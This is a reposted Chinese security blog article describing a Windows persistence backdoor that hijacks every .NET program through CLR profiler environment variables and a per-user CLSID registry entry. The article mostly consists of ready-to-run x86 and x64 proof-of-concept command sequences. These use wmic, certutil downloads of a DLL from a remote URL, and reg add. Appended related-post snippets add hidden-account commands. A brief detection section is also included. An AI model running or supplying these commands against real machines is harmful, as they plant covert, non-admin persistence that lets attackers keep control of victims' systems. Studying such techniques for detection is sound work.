利用CLR实现一种无需管理员权限的后门

最新推荐文章于 2024-08-04 12:03:42 发布
最新推荐文章于 2024-08-04 12:03:42 发布
阅读量407 收藏
点赞数 1
文章标签: runtime 操作系统
原文链接:https://yq.aliyun.com/articles/215002
版权
本文讲的是 利用CLR实现一种无需管理员权限的后门在之前的文章 《Use AppDomainManager to maintain persistence》 介绍了通过AppDomainManager实现的一种被动后门触发机制,演示了如何劫持系统.Net程序powershell_ise.exe,但前提是需要获得管理员权限。 

这一次将更进一步,介绍一种无需管理员权限的后门,并能够劫持所有.Net程序。

0x01 简介

本文将要介绍以下内容:

· CLR的使用

· 后门开发思路

· POC编写

· 后门检测

0x02 CLR的使用

CLR:

全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。

CLR是.NET Framework的主要执行引擎,作用之一是监视程序的运行:

· 在CLR监视之下运行的程序属于“托管的”(managed)代码

· 不在CLR之下、直接在裸机上运行的应用或者组件属于“非托管的”(unmanaged)的代码

CLR的使用:

测试系统: Win8 x86

1、启动cmd

输入如下代码:

SET COR_ENABLE_PROFILING=1

SET COR_PROFILER={11111111-1111-1111-1111-111111111111}

注:

{11111111-1111-1111-1111-111111111111}表示CLSID

可设置为任意数值,只要不和系统常用CLSID冲突就好

2、测试dll

使用弹框dll,下载地址:

https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

dll开发过程可参考:

https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/

可在cmd下实现直接下载,代码如下:

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete

操作如下图

利用CLR实现一种无需管理员权限的后门

注:

delete是为了清除下载文件的缓存

更多关于使用certutil.exe下载文件的利用细节可参考文章:《渗透测试中的certutil.exe》

3、操作注册表

注册表路径:HKEY_CURRENT_USERSoftwareClassesCLSID

新建子项{11111111-1111-1111-1111-111111111111},同步骤1 cmd输入的CLSID对应 
新建子项InProcServer32 
新建键值REG_SZ ThreadingModel:Apartment 
默认路径改为msg.dll的路径

修改后的注册表如下图

利用CLR实现一种无需管理员权限的后门

对应cmd代码如下:

SET KEY=HKEY_CURRENT_USERSoftwareClassesCLSID{11111111-1111-1111-1111-111111111111}InProcServer32

REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%msg.dll" /F

REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

4、在当前cmd启动.net程序

例如powershell.exe,启动时加载msg.dll,弹框

操作如下图

利用CLR实现一种无需管理员权限的后门

注:

使用其他cmd执行powershell.exe不会加载msg.dll

原因:

SET COR_ENABLE_PROFILING=1

SET COR_PROFILER={11111111-1111-1111-1111-111111111111}

只作用于当前cmd,可通过cmd命令"set"判断

当然,执行其他.net程序也会加载msg.dll

测试如下图

利用CLR实现一种无需管理员权限的后门

0x03 后门开发思路

由以上测试得出结论,使用CLR能够劫持所有.Net程序的启动,但是只能作用于当前cmd

能否作用于全局呢?

自然想到了修改环境变量

通常,修改环境变量使用面板操作的方式,如下图

利用CLR实现一种无需管理员权限的后门

能否通过命令行修改环境变量呢?

自然想到了WMI

修改系统变量(需要管理员权限):

wmic ENVIRONMENT create name="1",username="<system>",VariableValue="1"

修改当前用户变量(当前用户权限):

wmic ENVIRONMENT create name="2",username="%username%",VariableValue="2"

注:

通过WMI修改环境变量需要系统重启或注销重新登录才能生效

接下来需要测试,是否只需要修改当前用户权限就能够实现作用于全局,答案是肯定的。

添加当前用户的环境变量:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"


wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

重启后,成功修改,如下图

利用CLR实现一种无需管理员权限的后门

现在直接启动.Net程序,弹框,成功加载msg.dll

如下图

利用CLR实现一种无需管理员权限的后门

至此,后门思路验证成功

0x04 POC编写

对于32位操作系统,参考0x03的代码就好,x86 POC如下:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
SET KEY=HKEY_CURRENT_USERSoftwareClassesCLSID{11111111-1111-1111-1111-111111111111}InProcServer32

REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%msg.dll" /F

REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

对应64位系统,需要注意重定向问题,注册表存在32位和64位两个位置

注:

更多关于64位系统的重定向细节可参考文章《关于32位程序在64位系统下运行中需要注意的重定向问题》

结合到本文,32位需要对应32位的dll,64位对应64位的dll

所以,需要准备64位的dll,下载地址如下:

https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll

过程不再赘述,64位POC如下:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
SET KEY=HKEY_CURRENT_USERSoftwareClassesCLSID{11111111-1111-1111-1111-111111111111}InProcServer32

REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%msg_x64.dll" /F

REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 
SET KEY=HKEY_CURRENT_USERSoftwareClassesWoW6432NodeCLSID{11111111-1111-1111-1111-111111111111}InProcServer32

REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%msg.dll" /F

REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

能够分别劫持32位和64位的.Net程序,完整测试如下图

利用CLR实现一种无需管理员权限的后门

注:

更多代码细节可见github,地址如下:

https://github.com/3gstudent/CLR-Injection

0x05 后门检测

结合利用方式,检测方法如下:

· 检查环境变量COR_ENABLE_PROFILINGCOR_PROFILER

· 检查注册表键值HKEY_CURRENT_USERSoftwareClassesCLSID

0x06 小结

本文介绍了通过CLR劫持.Net程序的后门,特点是无需管理员权限,并能够劫持所有.Net程序。更重要的是,系统默认会调用.net程序,导致后门自动触发。




原文发布时间为:2017年8月9日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
weixin_34220623
关注
Windows提权的几种常用姿势
01-11 4万+
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、B...
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1212
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
利用CLR劫持dll建立持续性后门
SheXinK’s Blog
11-23 959
利用CLR劫持dll建立持续性后门1、 测试环境2、 持续性后门建立 2、1 配置环境变量 2、2 生成 dll payload 2、3 在注册表中添加相应的键值   CLR全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。 1、 测试环境   攻击机:192.168.11.131   靶机:192.168.11.132(Win7) 2、 ...
CLR是什么
fenghu89的专栏
10-03 1946
CLR(公共语言运行库)和Java虚拟机一样也是一个运行时环境,它负责资源管理(内存分配和垃圾收集),并保证应用和底层操作系统之间必要的分离。为了提高平台的可靠性,以及为了达到面向事务的电子商务应用所要求的稳定性级别,CLR还要负责其他一些任务,比如监视程序的运行。按照.NET的说法,在CLR监视之下运行的程序属于"受管理的"(managed)代码,而不在CLR之下、直接在裸机上运行的应用或者组件
内网权限维持——映像劫持&CLR劫持
最新发布
qq_55202378的博客
08-04 797
IFEO(,镜像文件执行选项)是windows系统的一个注册表项,路径为。在windows NT系统中,IFEO原本是为一些在默认系统环境中允许是可能引发错误的程序执行体提供特殊的环境设定。利用IFEO,开发人员能够在程序运行之前执行程序所配套的环境配置程序。
CLR简介(一)
weixin_34301307的博客
03-11 135
什么是通用语言运行时(CLR),简单来讲: CLR是一个支持多种编程语言及多语言互操作,完整的高级虚拟机。 有点拗口,而且不是很有启发性,但上面的文字是将又大又复杂的CLR的功能归类以便容易理解的第一步。它从一万英尺的高度来帮助我们理解CLR的设计目标。从这个高度明了CLR之后,我们可以深入其各个组件了。 CLR: 一个(极少见的)完整编程平台 每个程序在运行的时候都有惊人数量的运...
利用CLR进行权限维持
热门推荐
Shanfenglan's blog
11-06 10万+
1.前言 CLR可以对运行对.NET程序进行监控,CLR全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。这种权限为此对方式可以理解成,让系统在执行.NET程序的时候先执行一个你指定的dll文件,且不需要管理员权限。 2.命令 为了使得CLR能够劫持全局的所有.NET文件,我们需要修改环境变量。所有操作入下: 修改环境变量: wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username=
Use CLR to maintain persistence
ACdream
03-15 284
https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/a当按照实验步骤没有做成功的时候,一定需要的是静下心来,再做一遍检查自己的环境版本,理论理解,编程实现上是否有问题贴个成功的截图...
Windows常见的几种权限维持
hackzkaq的博客
05-24 1703
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
6.2. 持久化 - Windows
Sumarua的博客
07-07 1529
文章目录6.2. 持久化 - Windows6.2.1. 隐藏文件6.2.2. LOLBAS6.2.2.1. 简介6.2.2.2. 常见程序6.2.3. 后门6.2.3.1. sethc6.2.3.2. 映像劫持6.2.3.3. 定时任务6.2.3.4. 登录脚本6.2.3.5. 屏幕保护程序6.2.3.6. 隐藏用户6.2.3.7. CLR6.2.3.8. Winlogon Helper DLL后门6.2.4. UAC6.2.4.1. 简介6.2.4.2. 会触发UAC的操作6.2.4.3. ByPass
Web日志安全分析技巧
06-24 3595
ox01 Web日志Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还...
CLRInjection - 通用托管注入(超级灰色按钮克星升级版)
10-30
这款软件可以将任意托管DLL用插件的形式,注入到正在运行中的.net托管程序集中去。提供插件编写的SDK和参考源代码。用户可以自己编写插件扩展注入功能。
.NET CLR Injection 运行时修改IL .NET HOOK
02-21
.NET CLR Injection 运行时修改IL .NET HOOK
CLR 基本概念理解
weixin_34357436的博客
09-26 141
AppDomain AppDomain可以视为一种轻量级进程,AppDomain可以像进程一样独立加载Assembly。一个Windows进程可以包含多个AppDomain。但是与进程不同的是,进程与线程有隶属关系,但是,AppDomain和进程之间是正交的,他们没有隶属关系。例如,一个进程存在两个AppDomain:ADA和ADB,对象A来自ADA,对象B来自ADB,如果A的某个方法调用了B的...
打开cmd的方式及常用的dos命令
weixin_46654717的博客
09-07 537
打开cmd的方式: 开始+系统+命令提示符 win键+R 输入cmd打开控制台(推荐使用) 在任意的文件夹下面,按住shift键+鼠标右键点击:在此处打开命令行窗口 在资源管理器的地址栏前面加上cmd路径 (管理员方式运行:在开始搜索cmd,然后点鼠标右键,选择 以管理员的身份运行) 常用的dos命令: #盘符切换:C: D: E: #查看当前目录下的所有文件->dir #切换目录:cd (change directory): 1.跨盘符切换:cd + /d + 文件名; 2.同级
环境变量配过了,依然找不到路径,办法
Cinderella_hou的博客
02-19 9467
有些工程需要环境变量,但是有时候会出现,环境变量配置了,依然报错找不到路径 。这个时候,解决办法: 第一: 检查你的环境变量名称是否有误; 第二:一定要记得重启啊,电脑重启之后,环境变量才有效啊!  呃呃呃,有点怀疑之间博客内容的质量了。
后台管理系统管理员权限设计与实现
猫和大海@—@的博客
12-20 2万+
   在开发后台管理系统的时候,例如OA系统,绩效系统,crm客户关系管理系统,都会存在用户权限划分的问题。该文章描述了角色的定义,以及权限的划分等含义并给出部分实现代码示例。数据库表设计如下图所示:     user和user_basicinfo:记录用户资料。     role:角色表,记录公司各种角色,比如:管理员,销售,销售主管,开发,开发经理等     permission:菜单表...
IronPython 2.6利用clrtype实现WCF服务集成
本文档主要介绍了如何在IronPython 2.6环境下利用新特性clrtype来承载和消费WCF(Windows Communication Foundation)服务。IronPython 作为一个.NET语言的实现,虽然它不直接支持WCF接口的定义,但通过与C#的集成,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值